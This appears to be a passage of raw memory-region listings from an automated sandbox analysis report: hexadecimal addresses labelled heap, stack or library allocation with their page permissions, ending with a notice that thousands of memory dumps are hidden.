heap
page read and write
12751710000
heap
page read and write
1EE96E1A000
heap
page read and write
21B6184D000
heap
page read and write
23FDC77E000
heap
page read and write
22A5F14D000
heap
page read and write
7DF027F000
stack
page read and write
2276E292000
heap
page read and write
22A5F3DF000
heap
page read and write
251FD3B6000
heap
page read and write
173E9BE000
stack
page read and write
214A9BC0000
heap
page read and write
20187805000
heap
page read and write
182D17DE000
heap
page read and write
2C443B10000
trusted library allocation
page read and write
4F5E000
stack
page read and write
1EC84A94000
trusted library allocation
page read and write
1EE96E29000
heap
page read and write
288CAC4A000
heap
page read and write
23FDA409000
heap
page read and write
1AF16DE0000
heap
page read and write
461DFE000
stack
page read and write
182D18A8000
heap
page read and write
1EC84CA8000
trusted library allocation
page read and write
21B6175B000
heap
page read and write
1EE980D000
stack
page read and write
251FD508000
heap
page read and write
20187A32000
heap
page read and write
2276E1A1000
heap
page read and write
22C26CD8000
heap
page read and write
182D1793000
heap
page read and write
1C0CBA43000
trusted library allocation
page read and write
2159CF47000
heap
page read and write
1EE96C07000
heap
page read and write
7FF7B3A72000
trusted library allocation
page read and write
1EC84A70000
heap
page execute and read and write
1AF18860000
heap
page read and write
251FD76E000
heap
page read and write
180C4B40000
heap
page read and write
7DEFFAF000
stack
page read and write
7FF7B3A80000
trusted library allocation
page read and write
22C26B97000
heap
page read and write
C806BFE000
stack
page read and write
182D187D000
heap
page read and write
1AF30F30000
heap
page read and write
182D18E8000
heap
page read and write
2159ACDF000
heap
page read and write
22A5F19D000
heap
page read and write
2159CE91000
heap
page read and write
201858C9000
heap
page read and write
1FC803E4000
trusted library allocation
page read and write
201876D7000
heap
page read and write
2159CF64000
heap
page read and write
251FD73B000
heap
page read and write
7FF7B3AF0000
trusted library allocation
page read and write
22A5F3EF000
heap
page read and write
2159CCDD000
heap
page read and write
1C515959000
trusted library allocation
page read and write
2C4453E0000
heap
page read and write
1EC8638E000
trusted library allocation
page read and write
201876B6000
heap
page read and write
7FF7B37D0000
trusted library allocation
page read and write
251FD3A0000
heap
page read and write
21B61728000
heap
page read and write
1276B570000
heap
page read and write
21B6183B000
heap
page read and write
251FD6A0000
heap
page read and write
EF1F6FC000
stack
page read and write
BBB627D000
stack
page read and write
EEE1D4E000
stack
page read and write
20694659000
heap
page read and write
1FC8007B000
trusted library allocation
page read and write
12752FD0000
trusted library allocation
page read and write
7FF7B3B00000
trusted library allocation
page read and write
2159CCF8000
heap
page read and write
22B803CA000
trusted library allocation
page read and write
251FB420000
heap
page read and write
1EE87FE000
stack
page read and write
251FD4B1000
heap
page read and write
946793C000
stack
page read and write
22A5F139000
heap
page read and write
20187A4D000
heap
page read and write
2276BF88000
heap
page read and write
22D54D0A000
trusted library allocation
page read and write
214AB700000
heap
page read and write
BBB64BE000
stack
page read and write
2276DF1D000
heap
page read and write
251FD74E000
heap
page read and write
202B070A000
heap
page read and write
38D69BE000
stack
page read and write
288CAB20000
heap
page read and write
20187A1B000
heap
page read and write
1AF190CB000
trusted library allocation
page read and write
237B18FB000
heap
page read and write
1F0D2C40000
trusted library allocation
page read and write
1C515210000
heap
page readonly
258D3A48000
heap
page read and write
20694653000
heap
page read and write
1330000
heap
page read and write
182D18E8000
heap
page read and write
258D3A38000
heap
page read and write
B88C23E000
stack
page read and write
16080933000
heap
page read and write
2C443B40000
heap
page readonly
21B61853000
heap
page read and write
21B5F7CC000
heap
page read and write
180C4DF6000
heap
page read and write
28176FF000
stack
page read and write
251FD41E000
heap
page read and write
2069468F000
heap
page read and write
288CABBE000
heap
page read and write
EEE1CCE000
stack
page read and write
1C5137C0000
heap
page read and write
21B615FD000
heap
page read and write
1AF1A3E5000
trusted library allocation
page read and write
1E07BCAC000
heap
page read and write
1AF19100000
trusted library allocation
page read and write
37791F2000
stack
page read and write
CAB33FE000
stack
page read and write
461EF7000
stack
page read and write
2159CF2B000
heap
page read and write
1EC85071000
trusted library allocation
page read and write
2C44599C000
heap
page read and write
2F6E137000
stack
page read and write
38D6ABE000
stack
page read and write
196803E7000
trusted library allocation
page read and write
22A5F046000
heap
page read and write
1E07BF52000
heap
page read and write
212F3E2D000
heap
page read and write
2276E12A000
heap
page read and write
1EE96E90000
heap
page read and write
2069466D000
heap
page read and write
53DCF7E000
stack
page read and write
1EC851A1000
trusted library allocation
page read and write
2276BF80000
heap
page read and write
2159CF36000
heap
page read and write
EEE0F77000
stack
page read and write
1275168B000
heap
page read and write
2276E128000
heap
page read and write
2159CCFD000
heap
page read and write
2F6E079000
stack
page read and write
21B615A1000
heap
page read and write
1EE96CED000
heap
page read and write
14BFAFB000
stack
page read and write
2C445E68000
trusted library allocation
page read and write
23FDA416000
heap
page read and write
2159CF28000
heap
page read and write
1AF188C0000
heap
page read and write
1348000
heap
page read and write
251FD3F2000
heap
page read and write
127534B4000
trusted library allocation
page read and write
202B2610000
heap
page execute and read and write
1AF190DC000
trusted library allocation
page read and write
2276C03A000
heap
page read and write
1D93BDA9000
heap
page read and write
1EE94D00000
heap
page read and write
258D1AD9000
heap
page read and write
7FF7B37D3000
trusted library allocation
page execute and read and write
206945BC000
heap
page read and write
21B61616000
heap
page read and write
1D93D7A0000
trusted library allocation
page read and write
23FDC418000
heap
page read and write
20694655000
heap
page read and write
22A5F036000
heap
page read and write
180C46E7000
heap
page read and write
173E7BD000
stack
page read and write
2069468F000
heap
page read and write
6B3EA7F000
stack
page read and write
182D18DB000
heap
page read and write
20187907000
heap
page read and write
BC5587F000
stack
page read and write
206945DD000
heap
page read and write
2159CF5A000
heap
page read and write
21B615E8000
heap
page read and write
2C44396C000
heap
page read and write
22D6C880000
heap
page read and write
180C471B000
heap
page read and write
22D54881000
trusted library allocation
page read and write
B88CD0E000
stack
page read and write
745ABF7000
stack
page read and write
182D18BD000
heap
page read and write
22A5F326000
heap
page read and write
23FDC5B6000
heap
page read and write
59DE000
stack
page read and write
AC9AEFF000
stack
page read and write
21B614A0000
heap
page read and write
1D94DCF1000
trusted library allocation
page read and write
214A9C70000
heap
page readonly
2C443950000
heap
page read and write
1C0CBC58000
trusted library allocation
page read and write
258D396E000
heap
page read and write
1EE867F000
stack
page read and write
2276DFE5000
heap
page read and write
2276DEA7000
heap
page read and write
180C46A1000
heap
page read and write
1C0C9C30000
heap
page read and write
180C46F2000
heap
page read and write
7FF7B38AC000
trusted library allocation
page execute and read and write
23FDC2C3000
heap
page read and write
1F0D13BB000
heap
page read and write
22C26CE6000
heap
page read and write
23FDC2D2000
heap
page read and write
212F3F3B000
heap
page read and write
6B3F17B000
stack
page read and write
214ABC01000
trusted library allocation
page read and write
20694655000
heap
page read and write
4A3723E000
stack
page read and write
258D3938000
heap
page read and write
22C26BB2000
heap
page read and write
22C26BEC000
heap
page read and write
173E838000
stack
page read and write
288CCE00000
heap
page read and write
202B2070000
heap
page readonly
2276E02A000
heap
page read and write
1E07C05E000
heap
page read and write
180C4DDB000
heap
page read and write
180C4C3A000
heap
page read and write
182D17B3000
heap
page read and write
180C2C75000
heap
page read and write
1EC86152000
trusted library allocation
page read and write
21B5F7F6000
heap
page read and write
7FF7B38B0000
trusted library allocation
page execute and read and write
16082660000
heap
page execute and read and write
212F3C03000
heap
page read and write
258D3968000
heap
page read and write
38D693E000
stack
page read and write
251FD76E000
heap
page read and write
251FD3A5000
heap
page read and write
16080973000
heap
page read and write
23FDA3C0000
heap
page read and write
251FD407000
heap
page read and write
38D6779000
stack
page read and write
1E079C10000
heap
page read and write
180C2D60000
heap
page read and write
7FF681C00000
unkown
page read and write
1EC82DE0000
heap
page read and write
202B27A8000
trusted library allocation
page read and write
21710620000
trusted library allocation
page read and write
12EBB9CE000
heap
page read and write
7FF7B3AE0000
trusted library allocation
page read and write
1EE96E4B000
heap
page read and write
21B614D2000
heap
page read and write
7FF7B39C0000
trusted library allocation
page execute and read and write
4A3707E000
stack
page read and write
20187935000
heap
page read and write
1E07B7A6000
heap
page read and write
22D54974000
trusted library allocation
page read and write
202B20C0000
trusted library allocation
page read and write
7DF12CE000
stack
page read and write
53DD2BF000
stack
page read and write
7FF7B3A20000
trusted library allocation
page read and write
20694657000
heap
page read and write
1C51387F000
heap
page read and write
16080A10000
heap
page readonly
21B614A7000
heap
page read and write
7FF7B3AE0000
trusted library allocation
page read and write
1609A7F1000
heap
page read and write
7FF7B37E0000
trusted library allocation
page read and write
1EE96B92000
heap
page read and write
There are 3446 hidden memdumps, click here to show them.